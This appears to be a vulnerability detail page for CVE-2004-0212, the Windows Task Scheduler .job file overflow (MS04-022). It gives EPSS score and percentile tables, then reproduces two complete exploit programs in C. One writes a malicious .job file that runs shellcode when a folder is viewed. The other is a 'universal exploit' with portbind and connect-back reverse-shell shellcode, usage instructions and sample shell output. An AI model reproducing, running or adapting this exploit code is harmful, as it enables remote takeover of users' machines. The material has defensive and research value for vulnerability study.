CVE-2004-0212 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	75.1%	–	–
2023-03-12	–	–	–	90.99%	–
2023-06-25	–	–	–	86.09%	–
2024-03-31	–	–	–	86.09%	–
2024-06-02	–	–	–	86.09%	–
2024-12-22	–	–	–	92.19%	–
2025-01-19	–	–	–	92.19%	–
2025-03-18	–	–	–	–	77.59%
2025-03-30	–	–	–	–	78.56%
2025-03-30	–	–	–	–	78.56,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	98%
2023-06-25	98%
2024-03-31	99%
2024-06-02	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

//************************************************************* // Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022) // Proof-of-Concept Exploit for English WinXP SP1 // 15 Jul 2004 // // Running this will create a file "j.job". When explorer.exe or any // file-open dialog box accesses the directory containing this file, // notepad.exe will be spawn. // // Greetz: snooq, sk and all guys at SIG^2 www security org sg // //************************************************************* #include <stdio.h> #include <windows.h> unsigned char jobfile[] = "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00" "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00" "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x80\x01\x44\x00\x3A\x00\x5C\x00\x61\x00" "\x2E\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x78\x00\x78\x00\x78\x00\x78\x00\x79\x00\x79\x00\x79\x00\x79\x00" "\x7A\x00\x7A\x00\x7A\x00\x7A\x00\x7B\x00\x7B\x00\x7B\x00" "\x5b\xc1\xbf\x71" // jmp esp in SAMLIB WinXP SP1 "\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44" "\x90\x90" // jmp esp lands here "\xEB\x80" // jmp backward into shellcode "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x04\x00\x44\x00\x3A\x00" "\x5C\x00\x00\x00\x07\x00\x67\x00\x75\x00\x65\x00\x73\x00\x74\x00" "\x31\x00\x00\x00\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00" "\x00\x00\x01\x00\x30\x00\x00\x00\xD4\x07\x07\x00\x0F\x00\x00\x00" "\x00\x00\x00\x00\x0B\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00"; /* * Harmless payload that spawns 'notepad.exe'... =p * Ripped from snooq's WinZip exploit */ unsigned char shellcode[]= "\x33\xc0" // xor eax, eax // slight modification to move esp up "\xb0\xf0" // mov al, 0f0h "\x2b\xe0" // sub esp,eax "\x83\xE4\xF0" // and esp, 0FFFFFFF0h "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xf6" // xor esi, esi "\x56" // push esi "\x68\x2e\x65\x78\x65" // push 'exe.' "\x68\x65\x70\x61\x64" // push 'dape' "\x68\x90\x6e\x6f\x74" // push 'ton' "\x46" // inc esi "\x56" // push esi "\x8d\x7d\xf1" // lea edi, [ebp-0xf] "\x57" // push edi "\xb8XXXX" // mov eax, XXXX -> WinExec() "\xff\xd0" // call eax "\x4e" // dec esi "\x56" // push esi "\xb8YYYY" // mov eax, YYYY -> ExitProcess() "\xff\xd0"; // call eax int main(int argc, char* argv[]) { unsigned char *ptr = (unsigned char *)shellcode; while (*ptr) { if (*((long *)ptr)==0x58585858) { *((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec"); } if (*((long *)ptr)==0x59595959) { *((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess"); } ptr++; } FILE *fp; fp = fopen("j.xxx", "wb"); if(fp) { unsigned char *ptr = jobfile + (31 * 16); memcpy(ptr, shellcode, sizeof(shellcode) - 1); fwrite(jobfile, 1, sizeof(jobfile)-1, fp); fclose(fp); DeleteFile("j.job"); MoveFile("j.xxx", "j.job"); } return 0; } // milw0rm.com [2004-07-18]

/* HOD-ms04022-task-expl.c: * * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit * * Exploit version 0.1 coded by * * * .::[ houseofdabus ]::. * * * [at inbox dot ru] * ------------------------------------------------------------------- * Tested on: * - Internet Explorer 6.0 (SP1) (iexplore.exe) * - Explorer (explorer.exe) * - Windows XP SP0, SP1 * * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl HOD-ms04022-task-expl.c * Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib * Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP] * * Shellcode: * 1 - Portbind shellcode * 2 - Connectback shellcode * * ------------------------------------------------------------------- * Example: * * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777 * * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit * * --- Coded by .::[ houseofdabus ]::. --- * * [*] Shellcode: Portbind, port = 7777 * [*] Generate file: expl.job * * C:\> * * start IE -> C:\ * * C:\>telnet localhost 7777 * Microsoft Windows XP [‚¥àá¨ï 5.1.2600] * (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001. * * C:\Documents and Settings\v.X\ ¡®ç¨© á⮫> * * ------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * */ /* #define _WIN32 */ #include <stdio.h> #include <stdlib.h> #ifdef _WIN32 #pragma comment(lib,"ws2_32") #include <winsock2.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #endif unsigned char jobfile[] = /* job header */ "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00" "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00" "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00" /* length */ "\x11\x11" /* garbage C:\... */ /* unicode */ "\x43\x00\x3A\x00\x5C\x00\x61\x00" "\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x1E\x82\xDC\x77" /* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */ /* for Win2k use jmp ebx or call ebx */ "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" "\x80\x31\x31\x80" /* generate exception */ "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x90\x90"; /* portbind shellcode */ unsigned char portbindsc[] = "\x90\x90" "\x90\x90\xEB\x06" /* overwrite SEH-frame */ "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" "\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70" "\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6" "\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e" "\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83" "\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32" "\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59" "\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50" "\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50" "\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14" "\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc" "\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c" "\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33" "\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44" "\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d" "\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50" "\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55" "\x28\xff\x55\x0c"; /* connectback shellcode */ unsigned char connectbacksc[] = "\x90\x90" "\x90\x90\xEB\x06" /* overwrite SEH-frame */ "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" "\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa" "\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02" "\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83" "\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83" "\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc" "\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8" "\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90" "\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50" "\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8" "\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56" "\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa" "\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab" "\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50" "\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff" "\x77\x38\xff\x55\x20\xff\x55\x0c"; /* use this form unsigned char sc[] = "\x90\x90" "\x90\x90\xEB\x06" - overwrite SEH-frame "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "... code ..."; */ unsigned char endofjob[] = "\x00\x00\x00\x00"; #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port) #define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283+16)) = (ip) #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port) void usage(char *prog) { printf("Usage:\n"); printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog); printf("\nShellcode:\n"); printf(" 1 - Portbind shellcode\n"); printf(" 2 - Connectback shellcode\n\n"); exit(0); } int main(int argc, char **argv) { unsigned short strlen; unsigned short port; unsigned long ip, sc; FILE *fp, *fp2; printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 4) usage(argv[0]); sc = atoi(argv[2]); if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]); fp = fopen(argv[1], "wb"); if (fp == NULL) { printf("[-] error: can\'t create file: %s\n", argv[1]); exit(0); } /* header & garbage */ fwrite(jobfile, 1, sizeof(jobfile)-1, fp); fseek(fp, 39*16, SEEK_SET); port = atoi(argv[3]); printf("[*] Shellcode: "); if (sc == 1) { SET_PORTBIND_PORT(portbindsc, htons(port)); printf("Portbind, port = %u\n", port); fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2; } else { ip = inet_addr(argv[4]); SET_CONNECTBACK_IP(connectbacksc, ip); SET_CONNECTBACK_PORT(connectbacksc, htons(port)); printf("Connectback, port = %u, IP = %s\n", port, argv[4]); fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2; } printf("[*] Generate file: %s\n", argv[1]); fwrite(&strlen, 1, 2, fp); fclose(fp); return 0; } // milw0rm.com [2004-07-31]